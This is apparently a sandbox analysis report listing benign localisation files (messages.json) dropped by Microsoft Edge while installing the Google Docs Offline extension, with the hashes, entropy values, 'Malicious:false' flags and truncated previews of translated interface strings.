                                                                                                                                                                                                                                                                                                Preview:{"createnew":{"message":"\u10d0\u10ee\u10da\u10d8\u10e1 \u10e8\u10d4\u10e5\u10db\u10dc\u10d0"},"explanationofflinedisabled":{"message":"\u10d7\u10e5\u10d5\u10d4\u10dc \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10ee\u10d0\u10e0\u10d7. Google Docs-\u10d8\u10e1 \u10d8\u10dc\u10e2\u10d4\u10e0\u10dc\u10d4\u10e2\u10d7\u10d0\u10dc \u10d9\u10d0\u10d5\u10e8\u10d8\u10e0\u10d8\u10e1 \u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10d2\u10d0\u10db\u10dd\u10e1\u10d0\u10e7\u10d4\u10dc\u10d4\u10d1\u10da\u10d0\u10d3 \u10d2\u10d0\u10d3\u10d0\u10d3\u10d8\u10d7 \u10de\u10d0\u10e0\u10d0\u10db\u10d4\u10e2\u10e0\u10d4\u10d1\u10d6\u10d4 Google Docs-\u10d8\u10e1 \u10db\u10d7\u10d0\u10d5\u10d0\u10e0 \u10d2\u10d5\u10d4\u10e0\u10d3\u10d6\u10d4 \u10d3\u10d0 \u10e9\u10d0\u10e0\u10d7\u10d4\u10d7 \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10e1\u10d8\u10dc\u10e5\u10e0\u10dd\u10dc\u10d8\u10d6\u10d0\u10ea\u10d8\u10d0, \u10e0\u10dd\u10d3\u10d4\u10e1\u10d0\u10ea \u10e8\u10d4\u10db\u10d3\u10d2\u10dd\u10

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir920_2096276513\CRX_INSTALL\_locales\kk\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):3235
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.6081439490236464
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:96:H3E+6rOEAbeHTln2EQ77Uayg45RjhCSj+OyRdM7AE9qdV:HXcR/nQXUayYV
                                                                                                                                                                                                                                                                                                MD5:2D94A58795F7B1E6E43C9656A147AD3C
                                                                                                                                                                                                                                                                                                SHA1:E377DB505C6924B6BFC9D73DC7C02610062F674E
                                                                                                                                                                                                                                                                                                SHA-256:548DC6C96E31A16CE355DC55C64833B08EF3FBA8BF33149031B4A685959E3AF4
                                                                                                                                                                                                                                                                                                SHA-512:F51CC857E4CF2D4545C76A2DCE7D837381CE59016E250319BF8D39718BE79F9F6EE74EA5A56DE0E8759E4E586D93430D51651FC902376D8A5698628E54A0F2D8
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"createnew":{"message":"\u0416\u0410\u04a2\u0410\u0421\u042b\u041d \u0416\u0410\u0421\u0410\u0423"},"explanationofflinedisabled":{"message":"\u0421\u0456\u0437 \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u043d\u0434\u0435\u0441\u0456\u0437. Google Docs \u049b\u043e\u043b\u0434\u0430\u043d\u0431\u0430\u0441\u044b\u043d \u0436\u0435\u043b\u0456 \u0431\u0430\u0439\u043b\u0430\u043d\u044b\u0441\u044b\u043d\u0441\u044b\u0437 \u049b\u043e\u043b\u0434\u0430\u043d\u0443 \u04af\u0448\u0456\u043d, \u043a\u0435\u043b\u0435\u0441\u0456 \u0436\u043e\u043b\u044b \u0436\u0435\u043b\u0456\u0433\u0435 \u049b\u043e\u0441\u044b\u043b\u0493\u0430\u043d\u0434\u0430, Google Docs \u043d\u0435\u0433\u0456\u0437\u0433\u0456 \u0431\u0435\u0442\u0456\u043d\u0435\u043d \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u043b\u0435\u0440 \u0431\u04e9\u043b\u0456\u043c\u0456\u043d \u043a\u0456\u0440\u0456\u043f, \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir920_2096276513\CRX_INSTALL\_locales\km\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):3122
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.891443295908904
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:96:/OOrssRU6Bg7VSdL+zsCfoZiWssriWqo2gx7RRCos2sEeBkS7Zesg:H5GRZlXsGdo
                                                                                                                                                                                                                                                                                                MD5:B3699C20A94776A5C2F90AEF6EB0DAD9
                                                                                                                                                                                                                                                                                                SHA1:1F9B968B0679A20FA097624C9ABFA2B96C8C0BEA
                                                                                                                                                                                                                                                                                                SHA-256:A6118F0A0DE329E07C01F53CD6FB4FED43E54C5F53DB4CD1C7F5B2B4D9FB10E6
                                                                                                                                                                                                                                                                                                SHA-512:1E8D15B8BFF1D289434A244172F9ED42B4BB6BCB6372C1F300B01ACEA5A88167E97FEDABA0A7AE3BEB5E24763D1B09046AE8E30745B80E2E2FE785C94DF362F6
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"createnew":{"message":"\u1794\u1784\u17d2\u1780\u17be\u178f\u200b\u1790\u17d2\u1798\u17b8"},"explanationofflinedisabled":{"message":"\u17a2\u17d2\u1793\u1780\u200b\u1782\u17d2\u1798\u17b6\u1793\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f\u17d4 \u178a\u17be\u1798\u17d2\u1794\u17b8\u200b\u1794\u17d2\u179a\u17be Google \u17af\u1780\u179f\u17b6\u179a\u200b\u1794\u17b6\u1793\u200b\u200b\u178a\u17c4\u1799\u200b\u200b\u1798\u17b7\u1793\u1798\u17b6\u1793\u200b\u200b\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f \u179f\u17bc\u1798\u200b\u200b\u1791\u17c5\u200b\u1780\u17b6\u1793\u17cb\u200b\u1780\u17b6\u179a\u200b\u1780\u17c6\u178e\u178f\u17cb\u200b\u1793\u17c5\u200b\u179b\u17be\u200b\u1782\u17c1\u17a0\u1791\u17c6\u1796\u17d0\u179a Google \u17af\u1780\u179f\u17b6\u179a \u1793\u17b7\u1784\u200b\u1794\u17be\u1780\u200b\u1780\u17b6\u179a\u1792\u17d2\u179c\u17be\u200b\u179f\u1798\u1780\u17b6\u179b\u1780\u1798\u17d2\u1798\u200b\u200b\u200b\u1782\u17d2\u1798\u17b6\u1793

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir920_2096276513\CRX_INSTALL\_locales\kn\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1895
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.28990403715536
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:48:SHYGuEETiuF6OX5tCYFZt5GurMRRevsY4tVZIGnZRxlKT6/U0WG:yYG8iuF6yTCYFH5GjLPtVZVZRxOZ0J
                                                                                                                                                                                                                                                                                                MD5:38BE0974108FC1CC30F13D8230EE5C40
                                                                                                                                                                                                                                                                                                SHA1:ACF44889DD07DB97D26D534AD5AFA1BC1A827BAD
                                                                                                                                                                                                                                                                                                SHA-256:30078EF35A76E02A400F03B3698708A0145D9B57241CC4009E010696895CF3A1
                                                                                                                                                                                                                                                                                                SHA-512:7BDB2BADE4680801FC3B33E82C8AA4FAC648F45C795B4BACE4669D6E907A578FF181C093464884C0E00C9762E8DB75586A253D55CD10A7777D281B4BFFAFE302
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "........ .....".. },.. "explanationofflinedisabled": {.. "message": ".... ..................... ......... ............. Google ...... ....., Google ...... ............ ............... .... ..... ...... .... .... ............ ............. ........ ..... ... .....".. },.. "explanationofflineenabled": {.. "message": ".... ...................., .... .... .... ......... ........... ............ .... ........ .........."..

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir920_2096276513\CRX_INSTALL\_locales\ko\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1042
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.3945675025513955
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HAWYsF4dqNfBQH49Hk8YfIhYzTJ+6WJBtl/u4s+6:ZF4wNfvm87mX4LF6
                                                                                                                                                                                                                                                                                                MD5:F3E59EEEB007144EA26306C20E04C292
                                                                                                                                                                                                                                                                                                SHA1:83E7BDFA1F18F4C7534208493C3FF6B1F2F57D90
                                                                                                                                                                                                                                                                                                SHA-256:C52D9B955D229373725A6E713334BBB31EA72EFA9B5CF4FBD76A566417B12CAC
                                                                                                                                                                                                                                                                                                SHA-512:7808CB5FF041B002CBD78171EC5A0B4DBA3E017E21F7E8039084C2790F395B839BEE04AD6C942EED47CCB53E90F6DE818A725D1450BF81BA2990154AFD3763AF
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": ".. ...".. },.. "explanationofflinedisabled": {.. "message": ".... ...... ... .. .. Google Docs. ..... Google Docs .... .... .... .... .... ..... . .... .... ..... ......".. },.. "explanationofflineenabled": {.. "message": ".... ...... ... .. ... ... ..... ... ... .. . .....".. },.. "extdesc": {.. "message": ".... .... ... .., ...... . ....... .., .., ......".. },.. "extname": {.. "message": "Google Docs ....".. },.. "learnmore": {.. "message": "... ....".. },.. "popuphelptext": {.. "message": "... .. ... .... ..... .... .... .....

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir920_2096276513\CRX_INSTALL\_locales\lo\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):2535
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.8479764584971368
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:48:YRcHe/4raK1EIlZt1wg62FIOg+xGaF8guI5EP9I2yC:+cs4raK1xlZtOgviOfGaF8RI5EP95b
                                                                                                                                                                                                                                                                                                MD5:E20D6C27840B406555E2F5091B118FC5
                                                                                                                                                                                                                                                                                                SHA1:0DCECC1A58CEB4936E255A64A2830956BFA6EC14
                                                                                                                                                                                                                                                                                                SHA-256:89082FB05229826BC222F5D22C158235F025F0E6DF67FF135A18BD899E13BB8F
                                                                                                                                                                                                                                                                                                SHA-512:AD53FC0B153005F47F9F4344DF6C4804049FAC94932D895FD02EEBE75222CFE77EEDD9CD3FDC4C88376D18C5972055B00190507AA896488499D64E884F84F093
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"createnew":{"message":"\u0eaa\u0ec9\u0eb2\u0e87\u0ec3\u0edd\u0ec8"},"explanationofflinedisabled":{"message":"\u0e97\u0ec8\u0eb2\u0e99\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ea2\u0eb9\u0ec8. \u0ec0\u0e9e\u0eb7\u0ec8\u0ead\u0ec3\u0e8a\u0ec9 Google Docs \u0ec2\u0e94\u0e8d\u0e9a\u0ecd\u0ec8\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94, \u0ec3\u0eab\u0ec9\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e81\u0eb2\u0e99\u0e95\u0eb1\u0ec9\u0e87\u0e84\u0ec8\u0eb2\u0ec3\u0e99\u0edc\u0ec9\u0eb2 Google Docs \u0ec1\u0ea5\u0ec9\u0ea7\u0ec0\u0e9b\u0eb5\u0e94\u0ec3\u0e8a\u0ec9\u0e81\u0eb2\u0e99\u0e8a\u0eb4\u0ec9\u0e87\u0ec1\u0e9a\u0e9a\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ec3\u0e99\u0ec0\u0e97\u0eb7\u0ec8\u0ead\u0e95\u0ecd\u0ec8\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e97\u0ec8\u0eb2\u0e99\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94."},"explanationofflineenabled":{"message":"\u0e97\u0ec

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir920_2096276513\CRX_INSTALL\_locales\lt\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1028
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.797571191712988
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HAivZZaJ3Rje394+k7IKgpAJjUpSkiQjuRBMd:fZZahBeu7IKgqeMg
                                                                                                                                                                                                                                                                                                MD5:970544AB4622701FFDF66DC556847652
                                                                                                                                                                                                                                                                                                SHA1:14BEE2B77EE74C5E38EBD1DB09E8D8104CF75317
                                                                                                                                                                                                                                                                                                SHA-256:5DFCBD4DFEAEC3ABE973A78277D3BD02CD77AE635D5C8CD1F816446C61808F59
                                                                                                                                                                                                                                                                                                SHA-512:CC12D00C10B970189E90D47390EEB142359A8D6F3A9174C2EF3AE0118F09C88AB9B689D9773028834839A7DFAF3AAC6747BC1DCB23794A9F067281E20B8DC6EA
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "SUKURTI NAUJ.".. },.. "explanationofflinedisabled": {.. "message": "Esate neprisijung.. Jei norite naudoti .Google. dokumentus be interneto ry.io, pagrindiniame .Google. dokument. puslapyje eikite . nustatym. skilt. ir .junkite sinchronizavim. neprisijungus, kai kit. kart. b.site prisijung. prie interneto.".. },.. "explanationofflineenabled": {.. "message": "Esate neprisijung., bet vis tiek galite redaguoti pasiekiamus failus arba sukurti nauj..".. },.. "extdesc": {.. "message": "Redaguokite, kurkite ir per.i.r.kite savo dokumentus, skai.iuokles ir pristatymus . visk. darykite be prieigos prie interneto.".. },.. "extname": {.. "message": ".Google. dokumentai neprisijungus".. },.. "learnmore": {.. "message": "Su.inoti daugiau".. },.. "popuphelptext": {.. "message": "Ra.ykite, redaguokite ir bendradarbiaukite bet kurioje vietoje naudodami interneto ry.. arba

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir920_2096276513\CRX_INSTALL\_locales\lv\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):994
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.700308832360794
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HAaJ7a/uNpoB/Y4vPnswSPkDzLKFQHpp//BpPDB:7J7a/uzQ/Y4vvswhDzDr/LDB
                                                                                                                                                                                                                                                                                                MD5:A568A58817375590007D1B8ABCAEBF82
                                                                                                                                                                                                                                                                                                SHA1:B0F51FE6927BB4975FC6EDA7D8A631BF0C1AB597
                                                                                                                                                                                                                                                                                                SHA-256:0621DE9161748F45D53052ED8A430962139D7F19074C7FFE7223ECB06B0B87DB
                                                                                                                                                                                                                                                                                                SHA-512:FCFBADEC9F73975301AB404DB6B09D31457FAC7CCAD2FA5BE348E1CAD6800F87CB5B56DE50880C55BBADB3C40423351A6B5C2D03F6A327D898E35F517B1C628C
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "IZVEIDOT JAUNU".. },.. "explanationofflinedisabled": {.. "message": "J.s esat bezsaist.. Lai lietotu pakalpojumu Google dokumenti bez interneta savienojuma, n.kamaj. reiz., kad ir izveidots savienojums ar internetu, atveriet Google dokumentu s.kumlapas iestat.jumu izv.lni un iesl.dziet sinhroniz.ciju bezsaist..".. },.. "explanationofflineenabled": {.. "message": "J.s esat bezsaist., ta.u varat redi..t pieejamos failus un izveidot jaunus.".. },.. "extdesc": {.. "message": "Redi..jiet, veidojiet un skatiet savus dokumentus, izkl.jlapas un prezent.cijas, neizmantojot savienojumu ar internetu.".. },.. "extname": {.. "message": "Google dokumenti bezsaist.".. },.. "learnmore": {.. "message": "Uzziniet vair.k".. },.. "popuphelptext": {.. "message": "Rakstiet, redi..jiet un sadarbojieties ar interneta savienojumu vai bez t. neatkar.gi no t., kur atrodaties.".. }..}..

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir920_2096276513\CRX_INSTALL\_locales\ml\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):2091
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.358252286391144
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HAnHdGc4LtGxVY6IuVzJkeNL5kP13a67wNcYP8j5PIaSTIjPU4ELFPCWJjMupV/:idGcyYPVtkAUl7wqziBsg9DbpN6XoN/
                                                                                                                                                                                                                                                                                                MD5:4717EFE4651F94EFF6ACB6653E868D1A
                                                                                                                                                                                                                                                                                                SHA1:B8A7703152767FBE1819808876D09D9CC1C44450
                                                                                                                                                                                                                                                                                                SHA-256:22CA9415E294D9C3EC3384B9D08CDAF5164AF73B4E4C251559E09E529C843EA6
                                                                                                                                                                                                                                                                                                SHA-512:487EAB4938F6BC47B1D77DD47A5E2A389B94E01D29849E38E96C95CABC7BD98679451F0E22D3FEA25C045558CD69FDDB6C4FEF7C581141F1C53C4AA17578D7F7
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "....... ............".. },.. "explanationofflinedisabled": {.. "message": "...... ........... ........... ............. ..... Google ....... ..........., Google ....... .......... ............. .... ...... ...... ... ............... .................... '.......... ................' .........".. },.. "explanationofflineenabled": {.. "message": "................., .......... ......... ....... ...... ..............

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir920_2096276513\CRX_INSTALL\_locales\mn\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):2778
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.595196082412897
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:48:Y943BFU1LQ4HwQLQ4LQhlmVQL3QUm6H6ZgFIcwn6Rs2ShpQ3IwjGLQSJ/PYoEQj8:I43BCymz8XNcfuQDXYN2sum
                                                                                                                                                                                                                                                                                                MD5:83E7A14B7FC60D4C66BF313C8A2BEF0B
                                                                                                                                                                                                                                                                                                SHA1:1CCF1D79CDED5D65439266DB58480089CC110B18
                                                                                                                                                                                                                                                                                                SHA-256:613D8751F6CC9D3FA319F4B7EA8B2BD3BED37FD077482CA825929DD7C12A69A8
                                                                                                                                                                                                                                                                                                SHA-512:3742E24FFC4B5283E6EE496813C1BDC6835630D006E8647D427C3DE8B8E7BF814201ADF9A27BFAB3ABD130B6FEC64EBB102AC0EB8DEDFE7B63D82D3E1233305D
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"createnew":{"message":"\u0428\u0418\u041d\u0418\u0419\u0413 \u04ae\u04ae\u0421\u0413\u042d\u0425"},"explanationofflinedisabled":{"message":"\u0422\u0430 \u043e\u0444\u043b\u0430\u0439\u043d \u0431\u0430\u0439\u043d\u0430. Google \u0414\u043e\u043a\u044b\u0433 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u0433\u04af\u0439\u0433\u044d\u044d\u0440 \u0430\u0448\u0438\u0433\u043b\u0430\u0445\u044b\u043d \u0442\u0443\u043b\u0434 \u0434\u0430\u0440\u0430\u0430\u0433\u0438\u0439\u043d \u0443\u0434\u0430\u0430 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u044d\u0434 \u0445\u043e\u043b\u0431\u043e\u0433\u0434\u043e\u0445\u0434\u043e\u043e Google \u0414\u043e\u043a\u044b\u043d \u043d\u04af\u04af\u0440 \u0445\u0443\u0443\u0434\u0430\u0441\u043d\u0430\u0430\u0441 \u0442\u043e\u0445\u0438\u0440\u0433\u043e\u043e \u0434\u043e\u0442\u043e\u0440\u0445 \u043e\u0444\u043b\u0430\u0439\u043d \u0441\u0438\u043d\u043a\u0438\u0439\u0433 \u0438\u0434\u044d\u0432\u0445\u0436\u04af\u04af\u043b\u043d\u0

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir920_2096276513\CRX_INSTALL\_locales\mr\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1719
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.287702203591075
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:48:65/5EKaDMw6pEf4I5+jSksOTJqQyrFO8C:65/5EKaAw6pEf4I5+vsOVqQyFO8C
                                                                                                                                                                                                                                                                                                MD5:3B98C4ED8874A160C3789FEAD5553CFA
                                                                                                                                                                                                                                                                                                SHA1:5550D0EC548335293D962AAA96B6443DD8ABB9F6
                                                                                                                                                                                                                                                                                                SHA-256:ADEB082A9C754DFD5A9D47340A3DDCC19BF9C7EFA6E629A2F1796305F1C9A66F
                                                                                                                                                                                                                                                                                                SHA-512:5139B6C6DF9459C7B5CDC08A98348891499408CD75B46519BA3AC29E99AAAFCC5911A1DEE6C3A57E3413DBD0FAE72D7CBC676027248DCE6364377982B5CE4151
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": ".... .... ...".. },.. "explanationofflinedisabled": {.. "message": "...... ...... ..... ......... ....... ....... ..... Google ....... ............, Google ....... .............. .......... .. ... ..... .... ...... ......... ...... ...... ...... .... .... ....".. },.. "explanationofflineenabled": {.. "message": "...... ...... ...., ..... ...... ...... ...... .... ....... ... ..... .... .... ... .....".. },.. "extdesc": {.. "message": "..... ..

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir920_2096276513\CRX_INSTALL\_locales\ms\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):936
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.457879437756106
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HARXIqhmemNKsE27rhdfNLChtyo2JJ/YgTgin:iIqFC7lrDfNLCIBRzn
                                                                                                                                                                                                                                                                                                MD5:7D273824B1E22426C033FF5D8D7162B7
                                                                                                                                                                                                                                                                                                SHA1:EADBE9DBE5519BD60458B3551BDFC36A10049DD1
                                                                                                                                                                                                                                                                                                SHA-256:2824CF97513DC3ECC261F378BFD595AE95A5997E9D1C63F5731A58B1F8CD54F9
                                                                                                                                                                                                                                                                                                SHA-512:E5B611BBFAB24C9924D1D5E1774925433C65C322769E1F3B116254B1E9C69B6DF1BE7828141EEBBF7524DD179875D40C1D8F29C4FB86D663B8A365C6C60421A7
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "BUAT BAHARU".. },.. "explanationofflinedisabled": {.. "message": "Anda berada di luar talian. Untuk menggunakan Google Docs tanpa sambungan Internet, pergi ke tetapan di halaman utama Google Docs dan hidupkan penyegerakan luar talian apabila anda disambungkan ke Internet selepas ini.".. },.. "explanationofflineenabled": {.. "message": "Anda berada di luar talian, tetapi anda masih boleh mengedit fail yang tersedia atau buat fail baharu.".. },.. "extdesc": {.. "message": "Edit, buat dan lihat dokumen, hamparan dan pembentangan anda . kesemuanya tanpa akses Internet.".. },.. "extname": {.. "message": "Google Docs Luar Talian".. },.. "learnmore": {.. "message": "Ketahui Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit dan bekerjasama di mana-mana sahaja anda berada, dengan atau tanpa sambungan Internet.".. }..}..

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir920_2096276513\CRX_INSTALL\_locales\my\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):3830
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.5483353063347587
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:48:Ya+Ivxy6ur1+j3P7Xgr5ELkpeCgygyOxONHO3pj6H57ODyOXOVp6:8Uspsj3P3ty2a66xl09
                                                                                                                                                                                                                                                                                                MD5:342335A22F1886B8BC92008597326B24
                                                                                                                                                                                                                                                                                                SHA1:2CB04F892E430DCD7705C02BF0A8619354515513
                                                                                                                                                                                                                                                                                                SHA-256:243BEFBD6B67A21433DCC97DC1A728896D3A070DC20055EB04D644E1BB955FE7
                                                                                                                                                                                                                                                                                                SHA-512:CD344D060E30242E5A4705547E807CE3CE2231EE983BB9A8AD22B3E7598A7EC87399094B04A80245AD51D039370F09D74FE54C0B0738583884A73F0C7E888AD8
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"createnew":{"message":"\u1021\u101e\u1005\u103a \u1015\u103c\u102f\u101c\u102f\u1015\u103a\u101b\u1014\u103a"},"explanationofflinedisabled":{"message":"\u101e\u1004\u103a \u1021\u1031\u102c\u1037\u1016\u103a\u101c\u102d\u102f\u1004\u103a\u1038\u1016\u103c\u1005\u103a\u1014\u1031\u1015\u102b\u101e\u100a\u103a\u104b \u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u1019\u103e\u102f \u1019\u101b\u103e\u102d\u1018\u1032 Google Docs \u1000\u102d\u102f \u1021\u101e\u102f\u1036\u1038\u1015\u103c\u102f\u101b\u1014\u103a \u1014\u1031\u102c\u1000\u103a\u1010\u1005\u103a\u1000\u103c\u102d\u1019\u103a \u101e\u1004\u103a\u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u101e\u100a\u1037\u103a\u1021\u1001\u102b Google Docs \u1015\u1004\u103a\u1019\u1005\u102c\u1019\u103b\u1000\u103a\u1014\u103e\u102c\u101b\u103e\u102d \u1006\u1000\u103a\u1010\u1004\u103a\u1019\u103b\u102c\u1038\u101e\u102d\u102f\u1037\u1

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir920_2096276513\CRX_INSTALL\_locales\ne\messages.json

                                                                                                                                                                                                                                                                                                Download File
